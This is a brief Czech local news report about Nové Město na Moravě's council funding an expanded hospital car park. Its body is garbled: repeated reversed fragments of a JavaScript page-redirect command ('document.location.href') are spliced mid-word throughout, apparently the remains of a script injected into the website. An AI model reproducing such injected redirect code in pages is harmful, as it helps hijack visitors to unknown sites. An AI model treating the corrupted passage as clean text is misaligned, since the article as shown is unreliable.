Rainbow page separator

Novoměstská radnice podpoří rozšíření parkoviště u nemocnice

Pátek, 10. prosince 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Individuální investiční dotaci ve výši 700 tisíc korun prostřednictvím veřejnoprávní smlouvy schválili novoměstští zastupitelé pro nemocnici. Přislíbená finanční podpora má podpořit rozšíření centrálního parkoviště před zdravotnickým zařízením. V plánu je vybudování celkem dvaatřiceti nových parkovacích stání s asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým povrchem. Veřejné parkoviště u nemocnice nedostačuje zájmu ze strany mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristů již řadu let – v poslední době situace graduje a někteří řidiči tam odstavují svá auta tak, že překážejí ostatním. Před nemocnicí nezřídka parkují také lidé z okolních by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů, kdy ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stav zhoršuje úbytek ploch, kde ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristé odstavovali svoje au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily. To novoměstská radnice hodlá řešit dalším navyšováním parkovacích stání v okolních ulicích. Zcela zaplněné bývá zejména v ranních a dopoledních hodinách i spodní nemocniční parkoviště pro pětaosmdesát aut, které je po první půlhodině stání placené. To bylo postaveno ve finanční režii Kraje Vysočina a nemocnice v roce 2013.